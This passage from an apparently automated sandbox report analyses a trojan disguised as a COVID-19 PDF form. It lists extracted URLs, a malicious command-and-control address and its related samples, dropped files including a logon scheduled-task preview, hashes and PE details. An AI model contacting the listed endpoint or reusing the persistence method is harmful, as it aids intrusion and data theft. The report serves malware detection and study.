                            http://www.goodfont.co.krRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fonts.combiRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpfalse
                              		high
                              http://www.carterandcone.comlRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.sajatypeworks.comRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.typography.netDRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/cTheRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.comRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cnRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-jones.htmlRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                  		high
                                  http://63.141.228.141/32.php/fn1ToJTMzu3Td?qMRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.238593884.000000000302F000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fonts.comrsPRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/DPleaseRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers8RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.fonts.comRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.sandoll.co.krRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fonts.comsRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.urwpp.deDPleaseRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.zhongyicts.com.cnRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.sakkal.comRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fonts.com8RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        63.141.228.141
                                        		unknownUnited States
                                        		33387NOCIXUStrue

                                        General Information

                                        Joe Sandbox Version:32.0.0 Black Diamond
                                        Analysis ID:442954
                                        Start date:01.07.2021
                                        Start time:14:35:31
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 6m 10s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:8
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@6/6@0/1
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 17.8% (good quality ratio 16.4%)
                                        • Quality average: 73.5%
                                        • Quality standard deviation: 31.5%
                                        HCA Information:
                                        • Successful, ratio: 98%
                                        • Number of executed functions: 58
                                        • Number of non-executed functions: 10
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .exe
                                        • Stop behavior analysis, all processes terminated
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        14:36:25API Interceptor3x Sleep call for process: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        63.141.228.141IcTsYNL7h3.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/2fhJw7EqIe0Rj
                                        CMA - customer Advisory - Container Charges.pdf.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/fn1ToJTMzu3Td
                                        cotizaci#U00f3n.pdf.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/ocGTdeFq2SWdX
                                        facturas y datos bancarios.PDF____________________________________.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/a1NQk98eWCWX2
                                        http___103.89.90.94_hthp_wininit.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/S4wFP8QBww9Tp
                                        g0-core-ofr-gogreen-plus-infographic.pdf.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/fn1ToJTMzu3Td
                                        datos bancarios y facturaa.pdf____________________________________________________.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/hGVMLp0uMVSWM
                                        gunzipped.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/BMnWlQ62x3Dhz
                                        SecuriteInfo.com.Trojan.Win32.Save.a.16492.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/auJMYiGBL7JHG
                                        #U00c1raj#U00e1nlat k#U00e9r#U00e9se 29#U00b706#U00b72021#U00b7pdf.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/S7zr5v1fXI3Rb
                                        wininit.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/S4wFP8QBww9Tp
                                        oyVktvL5Es.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/S4wFP8QBww9Tp
                                        Quotation of Medical-105.pdf.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/pydAkox9ETY5Y
                                        gunzipped.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/BMnWlQ62x3Dhz
                                        Proforma Invoice.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/pydAkox9ETY5Y
                                        i0GOFEs5MgSta4n.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/L6J4kh5OOGtJ5
                                        Ij5nHFBTiajpgfL.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/6mr5C1QFWrZ4O
                                        BlNBNJ41KC.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/YjfkU88ZV6lc0
                                        purchase inquiry.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/cLsdqrHIILVB5
                                        0B7mA6tYHm.exeGet hashmaliciousBrowse
                                        • 63.141.228.141/32.php/W2gf0zvk0cV5n

                                        Domains

                                        No context

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        NOCIXUSIcTsYNL7h3.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        CMA - customer Advisory - Container Charges.pdf.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        cotizaci#U00f3n.pdf.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        facturas y datos bancarios.PDF____________________________________.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        http___103.89.90.94_hthp_wininit.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        g0-core-ofr-gogreen-plus-infographic.pdf.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        datos bancarios y facturaa.pdf____________________________________________________.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        gunzipped.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        PaymentConfirmation.pdf.exeGet hashmaliciousBrowse
                                        • 192.187.111.220
                                        SecuriteInfo.com.Trojan.Win32.Save.a.16492.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        #U00c1raj#U00e1nlat k#U00e9r#U00e9se 29#U00b706#U00b72021#U00b7pdf.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        wininit.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        oyVktvL5Es.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        Quotation of Medical-105.pdf.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        gunzipped.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        Proforma Invoice.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        i0GOFEs5MgSta4n.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        Ij5nHFBTiajpgfL.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        BlNBNJ41KC.exeGet hashmaliciousBrowse
                                        • 63.141.228.141
                                        purchase inquiry.exeGet hashmaliciousBrowse
                                        • 63.141.228.141

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.log
                                        Process:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                        C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp
                                        Process:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1640
                                        Entropy (8bit):5.190304818792931
                                        Encrypted:false
                                        SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBAtn:cbh47TlNQ//rydbz9I3YODOLNdq3Y
                                        MD5:F73872B63B266AFAFA99963F04D01A52
                                        SHA1:9D63EF99D643DB7666E16C2FB91D6E7867682240
                                        SHA-256:AA84922BAC808392632A0865DFC1897AAC611A5D4E3BF1D8035F1C0495D6158D
                                        SHA-512:70C3BEE130D29B53443F66F503B1976BCF5934A04A3CF21A67457658BBD32527EBD72FC42A226D3B7C1A74FD5095CD705EABDD174B431C4DC64EE7BBA4B8A5ED
                                        Malicious:true
                                        Reputation:low
                                        Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                        C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                                        Process:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview: 1
                                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                        Process:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):782
                                        Entropy (8bit):0.6303266404701133
                                        Encrypted:false
                                        SSDEEP:3:/lbOllbOllbOllbOllbOllbOllbOllbOllbON:u
                                        MD5:FF9627A22D5DADFECE3CEF2DDB25DA77
                                        SHA1:436098FB479AF2C7D4AFFFDD3AB473ABB9C0DACB
                                        SHA-256:EE69C77BF8B4528A01D97975F6120BD1C7043FDBF9464E2B3B1C7E4CAAC2E06F
                                        SHA-512:1CDAFD7571755D0C534E14559B78AEFB5567012BC7C1962B5D41C868168EDE0DC2FD68A651FEFB6C0E3D0C7483CC07A5D374176C2400D78EC4B6C800495389BD
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.
                                        C:\Users\user\AppData\Roaming\qvDFOnW.exe
                                        Process:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1109504
                                        Entropy (8bit):5.548871791041164
                                        Encrypted:false
                                        SSDEEP:12288:LHvr5hzhEZ66mE9GXlGxPvL+LI0Iyi/DnyqTts7RAV8hh:Lv9hzhkME9cEFzUI0Iyi/7vmaWhh
                                        MD5:EA646520496FD4603AAF0F5778231F0D
                                        SHA1:5112F3F6AE6A8A7CFAC8364433128228C450F203
                                        SHA-256:A130CF9DF18F1AE304826C98D4E7CFD2E75043B126A1DF0C0A36F98A64CDE5C2
                                        SHA-512:6F5F8F1312B9E2B98F5A4E415C41BC5CA35FB762D0F328C5056A844AA1FBA2DF7FBEE3550D4870EFA43483AF9131B256435070A6D6C1A7C3B1622A4C8678723C
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: Virustotal, Detection: 35%, Browse
                                        • Antivirus: ReversingLabs, Detection: 20%
                                        Reputation:low
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.`.............................(... ...@....@.. .......................`............@..................................'..K....`.......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.......@......................@....rsrc........`......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Roaming\qvDFOnW.exe:Zone.Identifier
                                        Process:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview: [ZoneTransfer]....ZoneId=0

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):5.548871791041164
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Windows Screen Saver (13104/52) 0.07%
                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                        File name:RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        File size:1109504
                                        MD5:ea646520496fd4603aaf0f5778231f0d
                                        SHA1:5112f3f6ae6a8a7cfac8364433128228c450f203
                                        SHA256:a130cf9df18f1ae304826c98d4e7cfd2e75043b126a1df0c0a36f98a64cde5c2
                                        SHA512:6f5f8f1312b9e2b98f5a4e415c41bc5ca35fb762d0f328c5056a844aa1fba2df7fbee3550d4870efa43483af9131b256435070a6d6c1a7c3b1622a4c8678723c
                                        SSDEEP:12288:LHvr5hzhEZ66mE9GXlGxPvL+LI0Iyi/DnyqTts7RAV8hh:Lv9hzhkME9cEFzUI0Iyi/7vmaWhh
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.`.............................(... ...@....@.. .......................`............@................................

                                        File Icon

                                        Icon Hash:7069696969616971

                                        Static PE Info

                                        General

                                        Entrypoint:0x4e280e
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x60DD43B5 [Thu Jul 1 04:25:25 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:v4.0.30319
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xe27c00x4b.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xe60000x2da98.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1140000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000xe08140xe0a00False0.606676274694SysEx File - Jellinghaus6.10267002947IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .sdata0xe40000x1e80x200False0.861328125data6.62657070624IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .rsrc0xe60000x2da980x2dc00False0.163096610314data2.30003219399IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x1140000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0xe64600x2868dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 0, next used block 0
